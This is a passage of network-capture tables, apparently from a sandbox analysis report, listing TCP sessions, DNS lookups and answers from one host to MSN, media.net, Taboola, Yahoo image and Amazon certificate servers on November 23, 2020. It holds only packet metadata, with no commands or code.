Nov 23, 2020 10:01:18.120672941 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.120687962 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.120696068 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.120713949 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.120749950 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.120790005 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.120807886 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.120842934 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.120866060 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.120927095 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.120944977 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.120984077 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121012926 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121043921 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121062994 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121093035 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121114969 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121208906 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121226072 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121243000 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121273041 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121285915 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121290922 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121320009 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121328115 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121365070 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121366024 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121423960 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121460915 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121478081 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121512890 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121537924 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121607065 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121624947 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121671915 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121725082 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121771097 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121774912 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121824980 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121826887 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121875048 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.121911049 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121956110 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.121961117 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.122000933 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.122016907 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.122051001 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.125452042 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.125474930 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.125489950 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.125509024 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.125544071 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.125607014 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.125614882 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.125633955 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.125679016 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.125710011 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.125718117 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.125724077 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.125786066 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.125833988 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.125852108 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.125891924 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.125936031 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.126015902 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.126036882 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.126069069 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.126089096 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.126104116 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.126122952 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.126153946 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.126189947 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.126203060 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.126234055 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.126255989 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.126343012 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.150738001 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.150790930 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.150827885 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.150867939 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.150888920 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.150914907 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.150928974 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.150935888 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.150937080 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.150942087 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.150973082 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.151009083 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.151026011 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.151041031 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.151087046 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.151817083 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.151856899 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.151895046 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.151896000 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.151917934 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.151933908 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.151937008 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.151973009 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.151988983 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.152012110 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.152036905 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.152046919 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.152075052 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.152082920 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.152087927 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.152122974 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.152137995 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.152159929 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:01:18.152189016 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:18.152218103 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:54.998445034 CET	49775	80	192.168.2.6	13.224.89.96
Nov 23, 2020 10:01:54.999677896 CET	49774	80	192.168.2.6	13.224.89.96
Nov 23, 2020 10:01:55.014705896 CET	80	49775	13.224.89.96	192.168.2.6
Nov 23, 2020 10:01:55.015198946 CET	49775	80	192.168.2.6	13.224.89.96
Nov 23, 2020 10:01:55.015682936 CET	49775	80	192.168.2.6	13.224.89.96
Nov 23, 2020 10:01:55.015741110 CET	80	49774	13.224.89.96	192.168.2.6
Nov 23, 2020 10:01:55.017744064 CET	49774	80	192.168.2.6	13.224.89.96
Nov 23, 2020 10:01:55.031883955 CET	80	49775	13.224.89.96	192.168.2.6
Nov 23, 2020 10:01:55.205692053 CET	80	49775	13.224.89.96	192.168.2.6
Nov 23, 2020 10:01:55.205805063 CET	49775	80	192.168.2.6	13.224.89.96
Nov 23, 2020 10:02:25.034250021 CET	80	49774	13.224.89.96	192.168.2.6
Nov 23, 2020 10:02:25.034408092 CET	49774	80	192.168.2.6	13.224.89.96
Nov 23, 2020 10:03:01.068167925 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:03:01.068279982 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:03:01.068391085 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.068659067 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.068730116 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.068825006 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.069062948 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.069216013 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.087405920 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.087464094 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.087495089 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.087536097 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.087825060 CET	443	49747	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.087851048 CET	443	49746	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.087865114 CET	443	49747	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.087892056 CET	443	49746	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.087896109 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.087903976 CET	443	49749	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.087915897 CET	443	49749	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.087976933 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.087990046 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.088006973 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.088021040 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.088063002 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.088107109 CET	443	49748	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.088123083 CET	443	49748	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.088422060 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.088438988 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.088730097 CET	443	49744	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.088743925 CET	443	49744	151.101.1.44	192.168.2.6
Nov 23, 2020 10:03:01.088794947 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.088860989 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:03:01.100868940 CET	443	49750	87.248.118.22	192.168.2.6
Nov 23, 2020 10:03:01.101090908 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:03:01.118041039 CET	443	49751	87.248.118.22	192.168.2.6
Nov 23, 2020 10:03:01.120332956 CET	49751	443	192.168.2.6	87.248.118.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2020 10:01:03.373295069 CET	60261	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:03.400552988 CET	53	60261	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:04.394789934 CET	56061	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:04.422111988 CET	53	56061	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:05.235579014 CET	58336	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:05.262823105 CET	53	58336	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:05.975136042 CET	53781	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:06.010601997 CET	53	53781	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:06.656116009 CET	54064	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:06.683136940 CET	53	54064	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:07.837450981 CET	52811	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:07.867043972 CET	53	52811	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:10.117074013 CET	55299	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:10.154614925 CET	53	55299	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:11.309439898 CET	63745	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:11.345123053 CET	53	63745	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:11.511337996 CET	50055	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:11.538450956 CET	53	50055	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:11.837380886 CET	61374	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:11.854727983 CET	50339	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:11.864561081 CET	53	61374	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:11.894856930 CET	53	50339	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:13.535144091 CET	63307	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:13.579273939 CET	53	63307	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:14.164591074 CET	49694	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:14.211651087 CET	53	49694	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:16.208420038 CET	54982	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:16.254051924 CET	53	54982	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:16.537796021 CET	50010	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:16.580461025 CET	53	50010	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:16.657929897 CET	63718	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:16.695084095 CET	53	63718	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:16.923115969 CET	62116	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:16.950463057 CET	53	62116	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:17.821415901 CET	63816	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:17.850327015 CET	55014	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:17.858516932 CET	53	63816	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:17.877458096 CET	53	55014	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:18.258014917 CET	62208	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:18.304246902 CET	53	62208	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:18.720748901 CET	57574	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:18.747880936 CET	53	57574	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:19.403693914 CET	51818	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:19.430845022 CET	53	51818	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:20.156281948 CET	56628	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:20.183429956 CET	53	56628	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:21.157802105 CET	60778	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:21.184972048 CET	53	60778	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:22.424233913 CET	53799	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:22.451306105 CET	53	53799	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:24.926309109 CET	54683	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:24.953509092 CET	53	54683	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:26.810400963 CET	59329	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:26.837620020 CET	53	59329	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:29.439117908 CET	64021	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:29.466535091 CET	53	64021	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:32.913362026 CET	56129	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:32.949060917 CET	53	56129	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:40.051505089 CET	58177	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:40.078659058 CET	53	58177	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:41.013487101 CET	50700	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:41.051387072 CET	53	50700	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:41.059372902 CET	58177	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:41.088753939 CET	53	58177	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:42.035195112 CET	50700	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:42.062361002 CET	53	50700	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:42.075859070 CET	58177	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:42.102895975 CET	53	58177	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:43.043664932 CET	50700	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:43.070985079 CET	53	50700	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:44.087961912 CET	58177	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:44.115113974 CET	53	58177	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:45.058054924 CET	50700	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:45.085184097 CET	53	50700	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:48.104468107 CET	58177	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:49.065547943 CET	50700	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:49.092760086 CET	53	50700	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:52.092369080 CET	54069	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:52.142608881 CET	53	54069	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:52.536128044 CET	61178	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:52.605644941 CET	53	61178	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:52.746651888 CET	57017	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:52.782265902 CET	53	57017	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:53.005171061 CET	56327	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:53.041579008 CET	53	56327	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:53.357016087 CET	50243	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:53.392986059 CET	53	50243	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:53.591083050 CET	62055	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:53.618149042 CET	53	62055	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:53.722861052 CET	61249	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:53.758460999 CET	53	61249	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:54.222910881 CET	65252	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:54.258701086 CET	53	65252	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:54.768007040 CET	64367	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:54.805799961 CET	53	64367	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:54.945307970 CET	55066	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:54.989778042 CET	53	55066	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:56.231209040 CET	60211	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:56.268904924 CET	53	60211	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:57.178369999 CET	56570	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:57.205378056 CET	53	56570	8.8.8.8	192.168.2.6
Nov 23, 2020 10:01:57.527442932 CET	58454	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:01:57.562868118 CET	53	58454	8.8.8.8	192.168.2.6
Nov 23, 2020 10:02:00.236738920 CET	55180	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:02:00.274486065 CET	53	55180	8.8.8.8	192.168.2.6
Nov 23, 2020 10:02:24.629793882 CET	58721	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:02:24.656785011 CET	53	58721	8.8.8.8	192.168.2.6
Nov 23, 2020 10:02:25.621994019 CET	58721	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:02:25.649010897 CET	53	58721	8.8.8.8	192.168.2.6
Nov 23, 2020 10:02:26.636605024 CET	58721	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:02:26.663800001 CET	53	58721	8.8.8.8	192.168.2.6
Nov 23, 2020 10:02:28.644231081 CET	58721	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:02:28.671411991 CET	53	58721	8.8.8.8	192.168.2.6
Nov 23, 2020 10:02:31.283128023 CET	57691	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:02:31.310208082 CET	53	57691	8.8.8.8	192.168.2.6
Nov 23, 2020 10:02:31.638089895 CET	52943	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:02:31.681180000 CET	53	52943	8.8.8.8	192.168.2.6
Nov 23, 2020 10:02:32.661329985 CET	58721	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:02:32.697055101 CET	53	58721	8.8.8.8	192.168.2.6
Nov 23, 2020 10:02:37.294620037 CET	59489	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:02:37.332012892 CET	53	59489	8.8.8.8	192.168.2.6
Nov 23, 2020 10:02:53.915620089 CET	64022	53	192.168.2.6	8.8.8.8
Nov 23, 2020 10:02:53.942819118 CET	53	64022	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 23, 2020 10:01:11.511337996 CET	192.168.2.6	8.8.8.8	0xa664	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:13.535144091 CET	192.168.2.6	8.8.8.8	0x8c2e	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:14.164591074 CET	192.168.2.6	8.8.8.8	0xb25b	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:16.208420038 CET	192.168.2.6	8.8.8.8	0x61f4	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:16.537796021 CET	192.168.2.6	8.8.8.8	0x5d59	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:16.657929897 CET	192.168.2.6	8.8.8.8	0x3e1	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:16.923115969 CET	192.168.2.6	8.8.8.8	0xf5f5	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:17.821415901 CET	192.168.2.6	8.8.8.8	0x18d6	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:17.850327015 CET	192.168.2.6	8.8.8.8	0x1bd5	Standard query (0)	s.yimg.com	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:54.945307970 CET	192.168.2.6	8.8.8.8	0x2b3a	Standard query (0)	ocsp.sca1b.amazontrust.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 23, 2020 10:01:11.538450956 CET	8.8.8.8	192.168.2.6	0xa664	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2020 10:01:13.579273939 CET	8.8.8.8	192.168.2.6	0x8c2e	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2020 10:01:14.211651087 CET	8.8.8.8	192.168.2.6	0xb25b	No error (0)	contextual.media.net		104.84.56.24	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:16.254051924 CET	8.8.8.8	192.168.2.6	0x61f4	No error (0)	hblg.media.net		104.84.56.24	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:16.580461025 CET	8.8.8.8	192.168.2.6	0x5d59	No error (0)	lg3.media.net		104.84.56.24	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:16.695084095 CET	8.8.8.8	192.168.2.6	0x3e1	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2020 10:01:16.950463057 CET	8.8.8.8	192.168.2.6	0xf5f5	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2020 10:01:16.950463057 CET	8.8.8.8	192.168.2.6	0xf5f5	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2020 10:01:17.858516932 CET	8.8.8.8	192.168.2.6	0x18d6	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2020 10:01:17.858516932 CET	8.8.8.8	192.168.2.6	0x18d6	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:17.858516932 CET	8.8.8.8	192.168.2.6	0x18d6	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:17.858516932 CET	8.8.8.8	192.168.2.6	0x18d6	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:17.858516932 CET	8.8.8.8	192.168.2.6	0x18d6	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:17.877458096 CET	8.8.8.8	192.168.2.6	0x1bd5	No error (0)	s.yimg.com	edge.gycpi.b.yahoodns.net		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2020 10:01:17.877458096 CET	8.8.8.8	192.168.2.6	0x1bd5	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.22	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:17.877458096 CET	8.8.8.8	192.168.2.6	0x1bd5	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.23	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:54.989778042 CET	8.8.8.8	192.168.2.6	0x2b3a	No error (0)	ocsp.sca1b.amazontrust.com		13.224.89.96	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:54.989778042 CET	8.8.8.8	192.168.2.6	0x2b3a	No error (0)	ocsp.sca1b.amazontrust.com		13.224.89.175	A (IP address)	IN (0x0001)
